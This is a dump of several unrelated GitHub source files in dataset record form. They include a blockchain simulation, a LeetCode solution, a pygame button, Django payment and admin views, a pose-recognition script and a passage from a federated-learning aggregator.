i == clusterSize:\r\n                    clusterSize += random.randint(1,7) #note: randint is inclusive of the upper bound\r\n                    miner.nodeData.append(cluster)\r\n                    cluster = []\r\n                    addedToCluster = []\r\n                else:\r\n                    if str(nodeData[i][0]) not in addedToCluster:\r\n                        cluster.append(nodeData[i])\r\n                        addedToCluster.append(str(nodeData[i][0]))\r\n                        skipped.pop(i)\r\n                    else:\r\n                        None\r\n                    i += 1\r\n    \r\n#################################################################\r\n\r\ndef getStatistics(MasterPlayerList, elapsedTime):\r\n    totalEvents = 0\r\n    approvedEvents = 0\r\n    deniedEvents = 0\r\n    \r\n    for player in MasterPlayerList:\r\n        approvedEvents += player.approvedCnt\r\n        deniedEvents += player.deniedCnt\r\n        totalEvents += (player.approvedCnt + player.deniedCnt)\r\n    \r\n    avgApproved = approvedEvents/totalEvents\r\n    avgDenied = deniedEvents/totalEvents\r\n    \r\n    print(\"End Statistics:\")\r\n    print(\"Total Events: \" + str(totalEvents))\r\n    print(\"Number Approved Events: \" + str(approvedEvents))\r\n    print(\"Number Denied Events: \" + str(deniedEvents))\r\n    print(\"Average Events Approved: \" + str(round(100*avgApproved,2))+\"%\")\r\n    print(\"Average Events Denied: \" + str(round(100*avgDenied,2))+\"%\")\r\n    print(\"Total Events 
Per Second: \" + str(round(totalEvents/elapsedTime,2)))\r\n print(\"Approved Events Per Second: \" + str(round(approvedEvents/elapsedTime,2)))\r\n print(\"Denied Events Per Second: \" + str(round(deniedEvents/elapsedTime,2)))\r\n \r\n \r\n#Generate Events on timed loop, writing to file\r\ndef generateEvents(A, B, C, D, E):\r\n startTime = time.time()\r\n runTime = 5\r\n previousTime = 0\r\n \r\n eventQueue = None\r\n events = []\r\n \r\n global playerList\r\n playerList = [A, B, C, D]\r\n \r\n minerList = [E]\r\n MasterPlayerList = [A, B, C, D] #A list of all players that ever existed in the simulation NEVER removed from\r\n MasterMinerList = [E]\r\n nameOptions = ['F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\r\n\r\n print('Generating Events...')\r\n while True: #Timed Loop\r\n currTime = time.time()\r\n elapsed_time = currTime - startTime\r\n \r\n nextTime = Miner.getEventTime()\r\n if len(nameOptions) > 0:\r\n #Players have been added\r\n if E.playersAdded == True:\r\n if E.numPlayersAdded < 2 and elapsed_time >= previousTime + nextTime: \r\n name = random.choice(nameOptions)\r\n role = Miner.getRole()\r\n nameOptions.remove(str(name))\r\n if role == \"Player\": \r\n eventLimit = P.Players.getEventLimit()\r\n acctBal = P.Players.getAcctBal()\r\n creditLimit = P.Players.getCreditLim(acctBal) \r\n newPlayer = P.Players(name, eventLimit, acctBal, creditLimit)\r\n playerList.append(newPlayer)\r\n MasterPlayerList.append(newPlayer)\r\n if role == \"Miner\":\r\n newPlayer = Miner(name)\r\n minerList.append(newPlayer)\r\n MasterMinerList.append(newPlayer)\r\n E.numPlayersAdded += 1\r\n E.addedPlayers.append(newPlayer)\r\n if E.numPlayersAdded > 0 and elapsed_time >= previousTime + nextTime:\r\n E.addedPlayers.remove(random.choice(E.addedPlayers))\r\n E.numPlayersAdded -= 1\r\n if E.numPlayersAdded == 0:\r\n E.playersAdded = False\r\n \r\n #Players have not been added\r\n if E.playersAdded == False:\r\n if elapsed_time >= previousTime + nextTime: \r\n name = random.choice(nameOptions)\r\n role = Miner.getRole()\r\n nameOptions.remove(str(name))\r\n if role == \"Player\": \r\n eventLimit = P.Players.getEventLimit()\r\n acctBal = P.Players.getAcctBal()\r\n creditLimit = P.Players.getCreditLim(acctBal) \r\n newPlayer = P.Players(name, eventLimit, acctBal, creditLimit)\r\n playerList.append(newPlayer)\r\n MasterPlayerList.append(newPlayer)\r\n if role == \"Miner\":\r\n newPlayer = Miner(name)\r\n minerList.append(newPlayer)\r\n MasterMinerList.append(newPlayer)\r\n E.numPlayersAdded += 1\r\n E.addedPlayers.append(newPlayer)\r\n E.playersAdded = True\r\n \r\n #Generate an event:\r\n for player in playerList:\r\n newEvent = ev.Events(player)\r\n newEvent.actionCode = ev.Events.rollActionCode(newEvent)\r\n newEvent.paymentMethod = ev.Events.getPaymentMethod()\r\n if newEvent.actionCode == 0 or newEvent.actionCode == 1: #Deposits or withdrawls\r\n newEvent.minerTarget = ev.Events.getMinerTarget(minerList)\r\n if newEvent.actionCode == 0:\r\n newEvent.paymentAmt = ev.Events.getPaymentAmt(newEvent)\r\n if newEvent.actionCode == 1:\r\n newEvent.withdrawlAmt = ev.Events.getWithdrawlAmt(newEvent.player)\r\n if newEvent.actionCode == 2: #Transfers\r\n newEvent.transferTarget = ev.Events.getTransferTarget(newEvent.player)\r\n newEvent.transferAmt = ev.Events.getPaymentAmt(newEvent)\r\n newEvent.arrivalTime = elapsed_time\r\n #temporary event list\r\n events.append(newEvent)\r\n \r\n previousTime = elapsed_time \r\n \r\n if elapsed_time > runTime:\r\n 
print(\"Ceased generating events after \" + str(elapsed_time) + \" seconds without issue.\")\r\n break\r\n \r\n #Filter Bad Events\r\n events = Miner.writeEvents(events, MasterPlayerList, MasterMinerList)\r\n \r\n #Create Priority Event Queue\r\n eventQueue = N.Node.buildLinkedList(events)\r\n #Write Events to File\r\n \r\n events = [x for x in events if x] #Filters out empty list components (Where holds used to be)\r\n df = pd.DataFrame(events)\r\n df.to_csv('transactionRequests.csv', encoding='utf-8', index=False) #Randomly generated transaction requests\r\n \r\n print(\" Event Requests Logged\")\r\n print(\" Executing Events\")\r\n Miner.executeEvents(MasterPlayerList, MasterMinerList, eventQueue)\r\n df = pd.DataFrame(E.requestStatus)\r\n df.to_csv('transactionStatus.csv', encoding='utf-8', index=False) #Banks approval or denial of requsts\r\n \r\n print(\" Getting blocks\")\r\n i = 1\r\n for miner in MasterMinerList:\r\n Miner.getBlockClusters(miner)\r\n i += 1\r\n\r\n print(\"Generating Blockchains\")\r\n for miner in MasterMinerList:\r\n if len(miner.nodeData) > 0:\r\n miner.blockChain = BC.Blockchain()\r\n for i in range(1,len(miner.nodeData)):\r\n string = str(miner.nodeData[i])\r\n string = string.replace(\"'\",\"\")\r\n if string != \"[]\":\r\n miner.blockChain.create_block_from_transaction(string)\r\n #miner.blockChain.display_chain()\r\n miner.blockChain.write_to_file(miner.name)\r\n \r\n P.Players.printPlayerInfo(MasterPlayerList)\r\n \r\n getStatistics(MasterPlayerList, elapsed_time)\r\n \r\n#############################################################\r\n#Establish Players\r\n#A\r\neventLimit = P.Players.getEventLimit()\r\nacctBal = P.Players.getAcctBal()\r\ncreditLimit = P.Players.getCreditLim(acctBal)\r\nA = P.Players(\"A\",eventLimit, acctBal, creditLimit)\r\n\r\n#B\r\neventLimit = P.Players.getEventLimit()\r\nacctBal = P.Players.getAcctBal()\r\ncreditLimit = P.Players.getCreditLim(acctBal) \r\nB = P.Players(\"B\", eventLimit, acctBal, creditLimit)\r\n\r\n#C\r\neventLimit = P.Players.getEventLimit()\r\nacctBal = P.Players.getAcctBal()\r\ncreditLimit = P.Players.getCreditLim(acctBal)\r\nC = P.Players(\"C\", eventLimit, acctBal, creditLimit)\r\n\r\n#D\r\neventLimit = P.Players.getEventLimit()\r\nacctBal = P.Players.getAcctBal()\r\ncreditLimit = P.Players.getCreditLim(acctBal)\r\nD = P.Players(\"D\", eventLimit, acctBal, creditLimit)\r\n\r\n#Establish Miner\r\n#E\r\nE = Miner(\"E\")\r\n\r\ngenerateEvents(A, B, C, D, E)","repo_name":"morguhnb/School_Related_Projects","sub_path":"Bitcoin Blockchain Simulation/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":21969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3643619426","text":"class Solution:\n def deleteAndEarn(self, nums: List[int]) -> int:\n total = [0]*(max(nums)+1)\n for val in nums:\n total[val] += val\n\n def rob(nums: List[int]) -> int:\n n = len(nums)\n first, second = nums[0], max(nums[0], nums[1])\n for i in range(2, n):\n first, second = second, max(first+nums[i], second)\n return second\n\n return rob(total)\n# @lc code=end\n","repo_name":"boredcui/LeetCode","sub_path":"DP/740.删除并获得点数.py","file_name":"740.删除并获得点数.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18029685629","text":"import pygame\r\nfrom utility.Constants import loadImageSheet\r\n\r\nclass Button(pygame.sprite.Sprite):\r\n \r\n def __init__(self, centerx, 
centery, dim, name):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.images, self. rect = loadImageSheet(name, dim)\r\n self.image = self.images[0]\r\n self.rect.center = (centerx, centery)\r\n \r\n def mouseIn(self):\r\n mx, my = pygame.mouse.get_pos()\r\n #Mouse is within bounds of box\r\n return mx > self.rect.left and mx < self.rect.right and my > self.rect.top and my < self.rect.bottom\r\n \r\n def setState(self, state):\r\n self.image = self.images[state]\r\n \r\n def update(self, pressed):\r\n currMouseIn = self.mouseIn()\r\n \r\n if currMouseIn:\r\n if pressed:\r\n self.setState(2)\r\n else:\r\n self.setState(1)\r\n else:\r\n self.setState(0)","repo_name":"XeraRequiem/Disc-Wars","sub_path":"utility/Button.py","file_name":"Button.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40777831870","text":"import json\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.db import transaction\nfrom django.db.models import F\nfrom django.shortcuts import render_to_response\n\nfrom inv.forms import PagoForm, TransaccionPagoForm\nfrom inv.funciones import model_to_dict_safe, ok_json, bad_json\nfrom inv.models import *\nfrom inv.views import addUserData, convertir_fecha\nfrom spa.settings import (FORMA_PAGO_EFECTIVO, FORMA_PAGO_CHEQUE, FORMA_PAGO_DEPOSITO, FORMA_PAGO_TARJETA,\n FORMA_PAGO_TRANSFERENCIA, FORMA_PAGO_RETENCION)\n\n\nclass ErrorPagos(Exception):\n\n def __init__(self, valor):\n self.valor = valor\n\n def __str__(self):\n return self.valor\n\n\n@login_required(redirect_field_name='ret', login_url='/login')\ndef view(request):\n data = {'title': u'Cobros'}\n addUserData(request, data)\n data['empresa'] = request.session['empresa']\n\n if request.method == 'POST':\n action = request.POST['action']\n\n if action == 'pendientes':\n cliente = Cliente.objects.get(pk=request.POST['cid'])\n ventas = cliente.factura_set.filter(total__gt=F('pagado'), valida=True).order_by('-fecha_vencimiento', 'numero')\n totalpendiente = 0\n totalpagado = 0\n lista = []\n for a in ventas:\n d = model_to_dict_safe(a, exclude=['fecha', 'fecha_vencimiento', 'detalles'])\n d['fecha'] = a.fecha_vencimiento.strftime(\"%d-%m-%Y\")\n d['cantidad_productos'] = a.cantidad_productos()\n totalpendiente += (a.total - a.pagado)\n totalpagado += a.pagado\n lista.append(d)\n\n return ok_json(data={\"datos\": lista, \"totalpendiente\": totalpendiente, \"totalpagado\": totalpagado})\n\n elif action == 'pago':\n datos = json.loads(request.POST['datos'])\n total = 0\n try:\n with transaction.atomic():\n # Facturas seleccionadas\n for documento in datos['ingresosapagar']:\n factura = Factura.objects.get(pk=documento['id'])\n # Pagos asociados\n for p in datos['pagos']:\n if p['formapago'] == str(FORMA_PAGO_EFECTIVO):\n pago = Pago(factura=factura,\n fecha=convertir_fecha(p['fechaefectivo']),\n valor=float(p['valor']),\n observaciones=p['observaciones'])\n pago.save()\n pagoefectivo = PagoEfectivo(pago=pago)\n pagoefectivo.save()\n total += pagoefectivo.pago.valor\n\n elif p['formapago'] == str(FORMA_PAGO_CHEQUE):\n pago = Pago(factura=factura,\n fecha=convertir_fecha(p['fechacheque']),\n valor=float(p['valor']),\n observaciones=p['observaciones'])\n pago.save()\n pagocheque = PagoCheque(pago=pago,\n numero=p['numerocheque'],\n banco_id=p['bancocheque'],\n postfechado=True if int(p['postfechado']) == 1 else False,\n depositado=True if int(p['depositado']) == 1 else False,\n 
fechadepositado=convertir_fecha(p['fechadepositado']),\n emite=p['emite'])\n pagocheque.save()\n total += pagocheque.pago.valor\n\n elif p['formapago'] == str(FORMA_PAGO_DEPOSITO):\n pago = Pago(factura=factura,\n fecha=convertir_fecha(p['fechadeposito']),\n valor=float(p['valor']),\n observaciones=p['observaciones'])\n pago.save()\n pagodeposito = PagoDeposito(pago=pago,\n numero=p['numerodeposito'],\n efectuadopor=p['efectuadopor'])\n pagodeposito.save()\n total += pagodeposito.pago.valor\n\n elif p['formapago'] == str(FORMA_PAGO_TRANSFERENCIA):\n pago = Pago(factura=factura,\n fecha=convertir_fecha(p['fechatransferencia']),\n valor=float(p['valor']),\n observaciones=p['observaciones'])\n pago.save()\n pagotransferencia = PagoTransferencia(pago=pago,\n numero=p['numerotransferencia'],\n efectuadopor=p['efectuadopor'])\n pagotransferencia.save()\n total += pagotransferencia.pago.valor\n\n elif p['formapago'] == str(FORMA_PAGO_TARJETA):\n if PagoTarjeta.objects.filter(referencia=p['referencia'], lote=p['lote']).exists():\n return bad_json(extradata={'result': 'repeat'})\n pago = Pago(factura=factura,\n fecha=convertir_fecha(p['fechatarjeta']),\n valor=float(p['valor']),\n observaciones=p['observaciones'])\n pago.save()\n pagotarjeta = PagoTarjeta(pago=pago,\n banco_id=p['bancotarjeta'],\n tipotarjeta_id=p['tipotarjeta'],\n poseedor=p['poseedor'],\n procesadorpago_id=p['procesadorpago'],\n referencia=p['referencia'],\n lote=p['lote'])\n pagotarjeta.save()\n total += pagotarjeta.pago.valor\n\n elif p['formapago'] == str(FORMA_PAGO_RETENCION):\n pago = Pago(factura=factura,\n fecha=convertir_fecha(p['fecharetencion']),\n valor=float(p['valor']),\n observaciones=p['observaciones'])\n pago.save()\n pagoretencion = PagoRetencion(pago=pago,\n numero=p['numeroretencion'])\n pagoretencion.save()\n total += pagoretencion.pago.valor\n\n factura.pagado += total\n factura.save()\n\n return ok_json()\n\n except Exception:\n return bad_json(error=1)\n\n return bad_json(error=0)\n\n else:\n try:\n cliente = None\n if 'cid' in request.GET and int(request.GET['cid']) > 0 and Cliente.objects.filter(pk=int(request.GET['cid'])).exists():\n cliente = Cliente.objects.filter(pk=int(request.GET['cid']))[0]\n\n data['hoy'] = hoy = datetime.now().date()\n data['form'] = PagoForm()\n data['form3'] = TransaccionPagoForm(initial={'valor': 0,\n 'fechacheque': hoy,\n 'fechaefectivo': hoy,\n 'fechadeposito': hoy,\n 'fechatransferencia': hoy,\n 'fechatarjeta': hoy,\n 'fechadepositado': hoy})\n data['formasdepago'] = FormaDePago.objects.all()\n data['forma_pago_efectivo'] = FORMA_PAGO_EFECTIVO\n data['forma_pago_cheque'] = FORMA_PAGO_CHEQUE\n data['forma_pago_deposito'] = FORMA_PAGO_DEPOSITO\n data['forma_pago_transferencia'] = FORMA_PAGO_TRANSFERENCIA\n data['forma_pago_tarjeta'] = FORMA_PAGO_TARJETA\n data['forma_pago_retencion'] = FORMA_PAGO_RETENCION\n data['procesadorespago'] = ProcesadorPagoTarjeta.objects.all()\n data['tipostarjeta'] = TipoTarjetaBanco.objects.all()\n data['cliente'] = cliente\n return render_to_response(\"pagos/view.html\", data)\n\n except Exception:\n pass\n","repo_name":"georgenavarro1802/spa","sub_path":"inv/pagos.py","file_name":"pagos.py","file_ext":"py","file_size_in_byte":9492,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"333628228","text":"# LISTA DE FORMA ORDENADA E ELIMINADO NUMEROS DIGITADOS REPETIDOS:\n\nlista = []\ncontinuar = ''\n\nwhile True:\n valor = int(input('DIGITE UM VALOR: '))\n contunuar = str(input('DESEJA 
CONTINUAR [S/N]:')).upper()\n    \n    if valor not in lista:\n        lista.append(valor)\n    \n    if contunuar == 'S':\n        continue\n    elif contunuar == 'N':\n        break\n\nlista.sort() # sorts the numbers in ascending order. Do not assign the result to a variable (sort() works in place)\nprint(f'OS NUMEROS DIGITADOS FORAM: {lista}')","repo_name":"CarlosNazario2010/Python-Fundamentos-2","sub_path":"10_ListaUnica.py","file_name":"10_ListaUnica.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"15899727492","text":"from operator import and_\nfrom django.views import View\nfrom django.shortcuts import render,redirect\nfrom django.contrib.auth.views import LoginView\nfrom django.contrib.auth import authenticate\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.contrib.auth import authenticate, login ,logout as auth_logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.cache import cache_control \nfrom .models import NewUserModel, addUsers\nfrom django.contrib.auth.models import User\nfrom .forms import addUserForm\nfrom django.contrib import messages\nfrom django.db.models import Q\n\n\n\n\n\n# HOMEPAGE\n# @cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@method_decorator(login_required,name='dispatch')\n\nclass HomePage(View):\n\n    def get(self,request):\n        \n        template = 'dashboard.html'\n        context = {\n            'my': \"\",\n\n\n        }\n        return render(request,template,context)\n\n    \n# LOGINPAGE\n\nclass LoginPage(LoginView):\n\n    template_name = 'login.html'\n\n    def get(self, request, *args, **kwargs):\n        context ={}\n        context['form'] = addUsers()\n        return render(request,self.template_name, context)\n    def post(self, request, *args, **kwargs):\n        print(request.POST['username'])\n        print(request.POST['password'])\n        user = authenticate(request, username=request.POST['username'], password=request.POST['password'])\n        if user is not None:\n            login(request, user)\n            return HttpResponseRedirect(reverse('home'))\n        return HttpResponseRedirect(reverse('login'))\n    \n\ndef logout(request):\n    auth_logout(request)\n    return HttpResponseRedirect(reverse('login'))\n\n\n# table\n@method_decorator(login_required,name='dispatch')\n\nclass Table(View):\n    def get(self, request, *args, **kwargs):\n\n        template = 'tables.html'\n        context = {\n            'data': \"Table\",\n        }\n        return render(request,template,context)\n\n\n# billing\n@method_decorator(login_required,name='dispatch')\n\nclass Billing(View):\n    def get(self, request, *args, **kwargs):\n\n        template = 'billing.html'\n        context = {\n            'data': \"Billing\", \n        }\n        return render(request,template,context)\n\n# Notifications\n@method_decorator(login_required,name='dispatch')\n\nclass Notification(View):\n    def get(self, request, *args, **kwargs):\n\n        template = 'notifications.html'\n        context = {\n            'data': \"Notification\",\n        }\n        return render(request,template,context)\n\n# Profile\n@method_decorator(login_required,name='dispatch')\n\nclass User(View):\n    def get(self, request, *args, **kwargs):\n\n        template = 'user.html'\n        context = {\n            'data': \"User Details\",\n        }\n        return render(request,template,context)\n\n# stocks\n@method_decorator(login_required,name='dispatch')\n\nclass Stocks(View):\n    def get(self, request, *args, **kwargs):\n\n        template = 'stocks.html'\n        context = {\n            'data': \"Stock Details\",\n        }\n        return render(request,template,context)\n\n\n# 
addUserForm\n@method_decorator(login_required,name='dispatch')\n\nclass AddUser(View):\n template = 'user/adduser.html'\n def get(self, request, *args, **kwargs):\n\n form = addUserForm()\n \n context = {'form': form,\n 'data': 'Add User'}\n return render(request,self.template,context)\n\n def post(self, request, *args, **kwargs):\n if request.method == 'POST':\n form = addUserForm(request.POST)\n if form.is_valid():\n # print(form.cleaned_data.get('nothing'))\n form.save()\n messages.success(request, 'Form submission successful')\n return redirect('adduser')\n else:\n form = addUserForm()\n return render(request, self.template, {'form': form, 'title':'register here'})\n\n# UserTable\n@method_decorator(login_required,name='dispatch')\nclass UserTable(View):\n template = 'user/usertable.html'\n def get(self, request, *args, **kwargs):\n\n userData = NewUserModel.objects.filter(~Q(username ='admin')).values()\n print(userData)\n \n context = { 'userData':userData,\n 'data': 'User Table'}\n return render(request,self.template,context)\n\n\n# def page_not_found(request,*args):\n# return render(request, 'hello.html', status=404)\n\n \n\n# def logined(request):\n\n# username = \"not logged in\"\n \n# if request.method == \"POST\":\n# #Get the posted form\n# MyLoginForm = AdminInputForm(request.POST)\n \n# if MyLoginForm.is_valid():\n# username = MyLoginForm.cleaned_data['username']\n# password = MyLoginForm.cleaned_data['password']\n# else:\n# MyLoginForm = AdminInputForm()\n\t\t\n# return render(request, 'login.html', {\"username\" : username,\"password\" : password})\n\n # def post(self, request, *args, **kwargs):\n\n # # mydata = Users.objects.filter(username = \"admin\").values()\n # # d = list(mydata)\n # # new = d[0]\n # # usernamedb = new['username']\n # # passworddb = new['password']\n\n\n # form = AdminInputForm()\n\n # if form.is_valid():\n \n # username = form.cleaned_data.get('username')\n # password = form.cleaned_data.get('password')\n \n\n \n # return render(request=request, template_name=\"login.html\", context={\"login_form\":username, \"user\":password})\n\n\n\n\n\n \n \n\n\n\n\n","repo_name":"rohithka/django","sub_path":"task_3/adminPanel/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4508489302","text":"import json, os, sys\nfrom bson.json_util import dumps\nfrom function import ds_util\n\ndef format_posts(data):\n posts = data[\"posts\"]\n posts.sort(key = lambda i: i['timestamp'], reverse=True)\n return posts\n\ndef handle(req):\n \"\"\"Client API to read the timeline of a user\n\n Calls user-timeline-service-read-user-timeline to acquire a user's timeline,\n formats the data in the right fashion and return it back to the client\n (e.g., a browser).\n\n Args:\n req (str): request body\n \"\"\"\n payload = json.loads(req)\n\n if ('user_id' not in payload or\n 'start' not in payload or\n 'stop' not in payload):\n msg = '''Make sure the input has `user_id`, `start`, `stop`'''\n ret = json.dumps({\"status\":\"MissingFieldError\", \"message\":msg})\n sys.exit(ret)\n\n function_url = \"http://gateway.openfaas:8080/function/user-timeline-service-read-user-timeline\"\n\n ret = ds_util.invoke(function_url, payload)\n\n if ret[\"http_status_code\"] != 200:\n return dumps({\"status\": \"UserTimelineReadFrontendError\",\n \"errors\":[ret]\n })\n\n return dumps({\"status\": \"success\", 
\"posts\":format_posts(ret)})\n","repo_name":"LedgeDash/DeathStarFaaS","sub_path":"user-timeline-read-frontend/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"39795742454","text":"\r\nimport numpy as np\r\nimport cv2\r\nimport mediapipe as mp\r\nimport pandas as pd\r\nimport threading\r\nimport tensorflow as tf\r\n\r\nlabel = \".....\"\r\nn_timesteps = 10\r\nlm_list=[] #luu gia tri cua khung xuong\r\n\r\nmodel = tf.keras.models.load_model(\"model1.h5\")\r\n\r\n#doc anh tu webcam\r\ncap = cv2.VideoCapture(0)\r\n\r\n#khoi tao thu vien mediapipe\r\nmpPose = mp.solutions.pose\r\npose = mpPose.Pose()\r\nmpDraw = mp.solutions.drawing_utils\r\n\r\ndef make_landmark_timestep(results):\r\n #print(results.pose_landmarks.landmark) #toa do cac diem tren khung xuong\r\n c_lm = []\r\n for id, lm in enumerate(results.pose_landmarks.landmark):\r\n c_lm.append(lm.x)\r\n c_lm.append(lm.y)\r\n c_lm.append(lm.z)\r\n c_lm.append(lm.visibility)\r\n return c_lm\r\n\r\ndef draw_landmark_on_image(mpDraw, results, img):\r\n #ve cac duong noi\r\n mpDraw.draw_landmarks(img, results.pose_landmarks, mpPose.POSE_CONNECTIONS)\r\n\r\n #ve cac diem nut\r\n for id, lm in enumerate(results.pose_landmarks.landmark):\r\n h, w, c = img.shape\r\n print(id, lm)\r\n cx, cy = int(lm.x+w), int(lm.y+h)\r\n cv2.circle(img, (cx, cy), 10, (0, 0, 255), cv2.FILLED) #red1\r\n return img \r\n\r\ndef draw_class_on_image(label, img): #gán nhãn lên ảnh\r\n font = cv2.FONT_HERSHEY_COMPLEX\r\n bottomLeftCornerOfText = (10, 30)\r\n fontScale = 1\r\n fontColor = (0, 255, 0) #green1\r\n thickness = 2\r\n lineType = 2\r\n cv2.putText(img, label, bottomLeftCornerOfText, font, fontScale, fontColor, thickness, lineType)\r\n return img\r\n\r\ndef detect(model, lm_list):\r\n global label\r\n lm_list = np.array(lm_list)\r\n lm_list = np.expand_dims(lm_list, axis=0)\r\n #print(lm_list.shape)\r\n results=model.predict(lm_list)\r\n print(\"results:\", results)\r\n if results[0][0] > 0.5:\r\n label = \"body swing\" #lắc người\r\n else: \r\n label = \"hand swing\" #vẫy tay\r\n return label\r\n\r\n\r\ni = 0\r\nwarmup_frames = 60\r\n\r\nwhile True:\r\n success, img = cap.read()\r\n imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) #chuyen anh sang mau xam\r\n results=pose.process(imgRGB)\r\n i = i + 1\r\n if i > warmup_frames:\r\n print(\"Start detect...\")\r\n\r\n if results.pose_landmarks:\r\n #ghi nhan thong so khung xuong\r\n c_lm = make_landmark_timestep(results)\r\n lm_list.append(c_lm) \r\n\r\n if len(lm_list) == n_timesteps:\r\n #predict\r\n t1 = threading.Thread(target=detect, args=(model, lm_list,))\r\n t1.start()\r\n lm_list=[]\r\n #ve khung xuong len anh\r\n img = draw_landmark_on_image(mpDraw, results, img)\r\n \r\n img = draw_class_on_image(label, img)\r\n cv2.imshow(\"Image\", img)\r\n if cv2.waitKey(1) == ord('q'):\r\n break\r\n\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"Thunga269/Machine-Learning---Deep-Learning","sub_path":"human activity regconition/inreference_lstm.py","file_name":"inreference_lstm.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2512654567","text":"\"\"\"Aula 12 - Desafio 04.\"\"\"\n\nfrom datetime import date\nnasc = int(input('Qual o seu ano de nascimento (aaaa)? '))\nidade = date.today().year - nasc\nif idade < 18:\n print('É muito cedo pra você se alistar. 
'\n          'Falta(m) {} ano(s) para o seu alistamento.'.format(18 - idade))\nelif idade == 18:\n    print('Esta na hora de se alistar!')\nelse:\n    print('Você deveria ter se alistado a {} ano(s) atrás. '\n          'Espero que você já esteja alistado.'.format(idade - 18))\n","repo_name":"gustavogattino/Curso-em-Video-Python","sub_path":"Mundo 2 - Basico/Aula12/aula12_desafio04.py","file_name":"aula12_desafio04.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"23947769022","text":"# Print every four-digit number that reads the same forwards and backwards\n# e.g. 1221\n\ndef is_pal(i_):\n    i_s = str(i_)  # convert to a string so it can be reversed\n    if i_s == i_s[::-1]:\n        return True\n    else:\n        return False\n\n\ni = 1000\nwhile i < 10000:\n    if is_pal(i):\n        print(i)\n    i += 1\n\n","repo_name":"Hainuo-Wang/Lanqiao_Cup","sub_path":"第十四届蓝桥杯/2.基础篇/2.6 回文数.py","file_name":"2.6 回文数.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"28236895913","text":"import logging\nimport time\nfrom copy import deepcopy\n\nfrom diskcache import Cache\nfrom flame.channel_manager import ChannelManager\nfrom flame.common.custom_abcmeta import ABCMeta, abstract_attribute\nfrom flame.common.util import (\n    MLFramework,\n    delta_weights_pytorch,\n    delta_weights_tensorflow,\n    get_ml_framework_in_use,\n    valid_frameworks,\n)\nfrom flame.config import Config\nfrom flame.mode.composer import Composer\nfrom flame.mode.message import MessageType\nfrom flame.mode.role import Role\nfrom flame.mode.tasklet import Loop, Tasklet\nfrom flame.optimizer.train_result import TrainResult\nfrom flame.optimizers import optimizer_provider\nfrom flame.plugin import PluginManager\n\nlogger = logging.getLogger(__name__)\n\nTAG_DISTRIBUTE = \"distribute\"\nTAG_AGGREGATE = \"aggregate\"\nTAG_FETCH = \"fetch\"\nTAG_UPLOAD = \"upload\"\n\n# 60 second wait time until a trainer appears in a channel\nWAIT_TIME_FOR_TRAINER = 60\n\n\nclass MiddleAggregator(Role, metaclass=ABCMeta):\n    \"\"\"Middle level aggregator.\n\n    It acts as a proxy between top level aggregator and trainer.\n    \"\"\"\n\n    @abstract_attribute\n    def config(self) -> Config:\n        \"\"\"Abstract attribute for config object.\"\"\"\n\n    def internal_init(self) -> None:\n        \"\"\"Initialize internal state for role.\"\"\"\n        # global variable for plugin manager\n        self.plugin_manager = PluginManager()\n\n        self.cm = ChannelManager()\n        self.cm(self.config)\n        self.cm.join_all()\n\n        self.optimizer = optimizer_provider.get(\n            self.config.optimizer.sort, **self.config.optimizer.kwargs\n        )\n\n        self._round = 1\n        self._work_done = False\n\n        # disk cache is used for saving memory in case model is large\n        # automatic eviction of disk cache is disabled with cull_limit 0\n        self.cache = Cache()\n        self.cache.reset(\"size_limit\", 1e15)\n        self.cache.reset(\"cull_limit\", 0)\n\n        self.dataset_size = 0\n\n        # save distribute tag in an instance variable\n        self.dist_tag = TAG_DISTRIBUTE\n\n        self.framework = get_ml_framework_in_use()\n        if self.framework == MLFramework.UNKNOWN:\n            raise NotImplementedError(\n                \"supported ml framework not found; \"\n                f\"supported frameworks are: {valid_frameworks}\"\n            )\n\n        if self.framework == MLFramework.PYTORCH:\n            self._delta_weights_fn = delta_weights_pytorch\n\n        elif self.framework == MLFramework.TENSORFLOW:\n            self._delta_weights_fn = delta_weights_tensorflow\n\n    def get(self, tag: str) -> None:\n        \"\"\"Get data from remote role(s).\"\"\"\n        if tag == TAG_FETCH:\n            
